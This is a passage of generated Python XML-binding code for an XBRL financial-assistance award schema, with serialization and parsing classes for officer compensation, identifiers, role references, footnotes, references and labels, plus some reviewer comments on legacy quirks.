        self.highlyCompensatedOfficerFirstName = highlyCompensatedOfficerFirstName
    def get_highlyCompensatedOfficerMiddleInitial(self):
        return self.highlyCompensatedOfficerMiddleInitial
    def set_highlyCompensatedOfficerMiddleInitial(self, highlyCompensatedOfficerMiddleInitial):
        self.highlyCompensatedOfficerMiddleInitial = highlyCompensatedOfficerMiddleInitial
    def get_highlyCompensatedOfficerLastName(self):
        return self.highlyCompensatedOfficerLastName
    def set_highlyCompensatedOfficerLastName(self, highlyCompensatedOfficerLastName):
        self.highlyCompensatedOfficerLastName = highlyCompensatedOfficerLastName
    def get_highlyCompensatedOfficerCompensation(self):
        return self.highlyCompensatedOfficerCompensation
    def set_highlyCompensatedOfficerCompensation(self, highlyCompensatedOfficerCompensation):
        self.highlyCompensatedOfficerCompensation = highlyCompensatedOfficerCompensation
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # Non-empty when any of the four child elements is present.
        return (
            self.highlyCompensatedOfficerFirstName is not None
            or self.highlyCompensatedOfficerMiddleInitial is not None
            or self.highlyCompensatedOfficerLastName is not None
            or self.highlyCompensatedOfficerCompensation is not None
        )
    def export(self, outfile, level, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
        """Write this element and its children as XML to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='highlyCompensatedOfficerComplexType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType'):
        # Emit the optional XML ``id`` attribute, at most once.
        if 'id' not in already_processed and self.id is not None:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='highlyCompensatedOfficerComplexType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''  # kept for parity with sibling exporters
        if self.highlyCompensatedOfficerFirstName is not None:
            self.highlyCompensatedOfficerFirstName.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerFirstName', pretty_print=pretty_print)
        if self.highlyCompensatedOfficerMiddleInitial is not None:
            self.highlyCompensatedOfficerMiddleInitial.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerMiddleInitial', pretty_print=pretty_print)
        if self.highlyCompensatedOfficerLastName is not None:
            self.highlyCompensatedOfficerLastName.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerLastName', pretty_print=pretty_print)
        if self.highlyCompensatedOfficerCompensation is not None:
            self.highlyCompensatedOfficerCompensation.export(outfile, level, namespace_='award:', name_='highlyCompensatedOfficerCompensation', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('id', node)
        if value is None or 'id' in already_processed:
            return
        already_processed.add('id')
        self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on tag name to the matching generated child type.
        if nodeName_ == 'highlyCompensatedOfficerFirstName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'highlyCompensatedOfficerFirstName'
            self.highlyCompensatedOfficerFirstName = obj_
        elif nodeName_ == 'highlyCompensatedOfficerMiddleInitial':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'highlyCompensatedOfficerMiddleInitial'
            self.highlyCompensatedOfficerMiddleInitial = obj_
        elif nodeName_ == 'highlyCompensatedOfficerLastName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'highlyCompensatedOfficerLastName'
            self.highlyCompensatedOfficerLastName = obj_
        elif nodeName_ == 'highlyCompensatedOfficerCompensation':
            obj_ = amountItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'highlyCompensatedOfficerCompensation'
            self.highlyCompensatedOfficerCompensation = obj_
# end class highlyCompensatedOfficerComplexType
class identifierType(GeneratedsSuper):
    """Generated binding for an ``identifier`` element: a text value
    (``valueOf_``) qualified by an optional ``scheme`` attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, scheme=None, valueOf_=None):
        self.original_tagname_ = None
        self.scheme = _cast(None, scheme)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if identifierType.subclass:
            return identifierType.subclass(*args_, **kwargs_)
        else:
            return identifierType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_scheme(self): return self.scheme
    def set_scheme(self, scheme): self.scheme = scheme
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is text content to serialize."""
        if (
            self.valueOf_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='identifierType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): writes encoded bytes -- Python 2 era idiom; on
            # Python 3 this would emit a bytes repr into a text stream.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierType'):
        """Write the optional ``scheme`` attribute."""
        if self.scheme is not None and 'scheme' not in already_processed:
            already_processed.add('scheme')
            outfile.write(' scheme=%s' % (quote_attrib(self.scheme), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierType', fromsubclass_=False, pretty_print=True):
        pass
    def build(self, node):
        """Populate this object from an element-tree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the optional ``scheme`` attribute from the node."""
        value = find_attr_value_('scheme', node)
        if value is not None and 'scheme' not in already_processed:
            already_processed.add('scheme')
            self.scheme = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class identifierType
class foreverType(GeneratedsSuper):
    """Binding for the empty ``forever`` element: no attributes, no children.

    Instances always serialize as an empty element.
    """
    subclass = None
    superclass = None
    def __init__(self):
        self.original_tagname_ = None
    @staticmethod
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        cls = foreverType.subclass or foreverType
        return cls(*args_, **kwargs_)
    def hasContent_(self):
        # The generated test was ``if ():`` -- an empty tuple, always
        # falsy -- so this type never reports content.
        return False
    def export(self, outfile, level, namespace_='finassist:', name_='foreverType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this (always empty) element to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='foreverType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='foreverType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='foreverType'):
        """No attributes to emit for this type."""
        pass
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='foreverType', fromsubclass_=False, pretty_print=True):
        """No children to emit for this type."""
        pass
    def build(self, node):
        """Populate this object from an element-tree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_node in node:
            local_name = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, local_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """No attributes to read for this type."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """No children to build for this type."""
        pass
# end class foreverType
class arcroleRef(simpleType):
    """Definition of the arcroleRef element - used to link to resolve
    xlink:arcrole attribute values to the arcroleType element
    declaration. This attribute contains the arc role name."""
    subclass = None
    superclass = simpleType
    def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, arcroleURI=None):
        self.original_tagname_ = None
        super(arcroleRef, self).__init__(show, title, actuate, href, role, arcrole, type_, )
        self.arcroleURI = _cast(None, arcroleURI)
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if arcroleRef.subclass:
            return arcroleRef.subclass(*args_, **kwargs_)
        else:
            return arcroleRef(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_arcroleURI(self): return self.arcroleURI
    def set_arcroleURI(self, arcroleURI): self.arcroleURI = arcroleURI
    def hasContent_(self):
        """Content comes only from the simpleType base class."""
        if (
            super(arcroleRef, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='arcroleRef', namespacedef_='', pretty_print=True):
        """Serialize this element and any base-class content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleRef')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcroleRef', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcroleRef'):
        """Write base-class attributes plus the optional ``arcroleURI``."""
        super(arcroleRef, self).exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleRef')
        if self.arcroleURI is not None and 'arcroleURI' not in already_processed:
            already_processed.add('arcroleURI')
            outfile.write(' arcroleURI=%s' % (quote_attrib(self.arcroleURI), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcroleRef', fromsubclass_=False, pretty_print=True):
        super(arcroleRef, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this object from an element-tree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read ``arcroleURI`` then delegate remaining attributes to the base."""
        value = find_attr_value_('arcroleURI', node)
        if value is not None and 'arcroleURI' not in already_processed:
            already_processed.add('arcroleURI')
            self.arcroleURI = value
        super(arcroleRef, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        super(arcroleRef, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class arcroleRef
class roleRef(simpleType):
    """Definition of the roleRef element - used to link to resolve
    xlink:role attribute values to the roleType element declaration.
    This attribute contains the role name."""
    subclass = None
    superclass = simpleType
    def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, roleURI=None):
        self.original_tagname_ = None
        super(roleRef, self).__init__(show, title, actuate, href, role, arcrole, type_, )
        self.roleURI = _cast(None, roleURI)
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if roleRef.subclass:
            return roleRef.subclass(*args_, **kwargs_)
        else:
            return roleRef(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_roleURI(self): return self.roleURI
    def set_roleURI(self, roleURI): self.roleURI = roleURI
    def hasContent_(self):
        """Content comes only from the simpleType base class."""
        if (
            super(roleRef, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='roleRef', namespacedef_='', pretty_print=True):
        """Serialize this element and any base-class content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='roleRef')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='roleRef', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='roleRef'):
        """Write base-class attributes plus the optional ``roleURI``."""
        super(roleRef, self).exportAttributes(outfile, level, already_processed, namespace_, name_='roleRef')
        if self.roleURI is not None and 'roleURI' not in already_processed:
            already_processed.add('roleURI')
            outfile.write(' roleURI=%s' % (quote_attrib(self.roleURI), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='roleRef', fromsubclass_=False, pretty_print=True):
        super(roleRef, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this object from an element-tree node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read ``roleURI`` then delegate remaining attributes to the base."""
        value = find_attr_value_('roleURI', node)
        if value is not None and 'roleURI' not in already_processed:
            already_processed.add('roleURI')
            self.roleURI = value
        super(roleRef, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        super(roleRef, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class roleRef
class footnote(resourceType):
    """Definition of the footnote resource element.

    Mixed-content resource: arbitrary child elements and the text
    interleaved around them are captured as ``mixedclass_`` wrappers in
    ``content_``.  (The generated docstring wrongly described this as
    the "reference" resource element.)
    """
    subclass = None
    superclass = resourceType
    def __init__(self, role=None, title=None, type_=None, id=None, label=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.original_tagname_ = None
        super(footnote, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        self.anyAttributes_ = {}
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if footnote.subclass:
            return footnote.subclass(*args_, **kwargs_)
        else:
            return footnote(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # BUG FIX: the generated code referenced non-existent ``self._anytypeobjs_``
    # (leading underscore), raising AttributeError on every call.
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_[index] = value
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        """True when any-type children, text, or base-class content exist."""
        if (
            self.anytypeobjs_ or
            self.valueOf_ or
            super(footnote, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='footnote', namespacedef_='', pretty_print=True):
        """Serialize this element, its attributes and mixed content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='footnote')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='footnote', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='footnote'):
        """Write wildcard (anyAttribute) attributes, then base-class attributes.

        xsi-namespaced attributes are re-prefixed as ``xsi:``; other
        namespaced attributes get a synthetic numeric xmlns prefix.
        """
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): numeric prefixes like ``xmlns:1``
                            # are not valid NCNames; kept as generated.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        super(footnote, self).exportAttributes(outfile, level, already_processed, namespace_, name_='footnote')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='footnote', fromsubclass_=False, pretty_print=True):
        """Export base-class children, then this class's mixed content items."""
        super(footnote, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def build(self, node):
        """Populate this object (including leading text content) from a node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Collect all not-yet-processed attributes into ``anyAttributes_``."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
        super(footnote, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Capture wildcard children and their tail text as mixed content."""
        # NOTE(review): the generated wildcard branch matches an empty tag
        # name via ``__ANY__``; kept as generated.
        if nodeName_ == '':
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
        super(footnote, self).buildChildren(child_, node, nodeName_, True)
# end class footnote
class reference(resourceType):
    """Definition of the reference resource element."""
    subclass = None
    superclass = resourceType
    def __init__(self, role=None, title=None, type_=None, id=None, label=None, part=None, valueOf_=None, mixedclass_=None, content_=None):
        self.original_tagname_ = None
        super(reference, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
        if part is None:
            self.part = []
        else:
            self.part = part
        self.valueOf_ = valueOf_
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        # (Redundant re-assignment kept from generator output.)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if reference.subclass:
            return reference.subclass(*args_, **kwargs_)
        else:
            return reference(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_part(self): return self.part
    def set_part(self, part): self.part = part
    def add_part(self, value): self.part.append(value)
    def insert_part_at(self, index, value): self.part.insert(index, value)
    def replace_part_at(self, index, value): self.part[index] = value
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """True when parts, text, or base-class content exist."""
        if (
            self.part or
            self.valueOf_ or
            super(reference, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='reference', namespacedef_='', pretty_print=True):
        """Serialize this element, its attributes and mixed content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='reference')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='reference', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='reference'):
        """All attributes come from the resourceType base class."""
        super(reference, self).exportAttributes(outfile, level, already_processed, namespace_, name_='reference')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='reference', fromsubclass_=False, pretty_print=True):
        """Export base-class children, then this class's mixed content items."""
        super(reference, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def build(self, node):
        """Populate this object (including leading text content) from a node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(reference, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Capture ``part`` children and tail text as mixed content items."""
        if nodeName_ == 'part' and child_.text is not None:
            valuestr_ = child_.text
            obj_ = self.mixedclass_(MixedContainer.CategorySimple,
                MixedContainer.TypeString, 'part', valuestr_)
            self.content_.append(obj_)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
        super(reference, self).buildChildren(child_, node, nodeName_, True)
# end class reference
class label(resourceType):
    """Definition of the label resource element.

    Mixed-content resource: arbitrary child elements and the text
    interleaved around them are captured as ``mixedclass_`` wrappers in
    ``content_``.
    """
    subclass = None
    superclass = resourceType
    def __init__(self, role=None, title=None, type_=None, id=None, label=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.original_tagname_ = None
        super(label, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        self.anyAttributes_ = {}
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
    def factory(*args_, **kwargs_):
        """Instantiate the registered subclass override, if any, else this class."""
        if label.subclass:
            return label.subclass(*args_, **kwargs_)
        else:
            return label(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # BUG FIX: the generated code referenced non-existent ``self._anytypeobjs_``
    # (leading underscore), raising AttributeError on every call.
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_[index] = value
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        """True when any-type children, text, or base-class content exist."""
        if (
            self.anytypeobjs_ or
            self.valueOf_ or
            super(label, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='label', namespacedef_='', pretty_print=True):
        """Serialize this element, its attributes and mixed content to outfile."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='label')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='label', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='label'):
        """Write wildcard (anyAttribute) attributes, then base-class attributes.

        xsi-namespaced attributes are re-prefixed as ``xsi:``; other
        namespaced attributes get a synthetic numeric xmlns prefix.
        """
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): numeric prefixes like ``xmlns:1``
                            # are not valid NCNames; kept as generated.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        super(label, self).exportAttributes(outfile, level, already_processed, namespace_, name_='label')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='label', fromsubclass_=False, pretty_print=True):
        """Export base-class children, then this class's mixed content items."""
        super(label, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def build(self, node):
        """Populate this object (including leading text content) from a node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
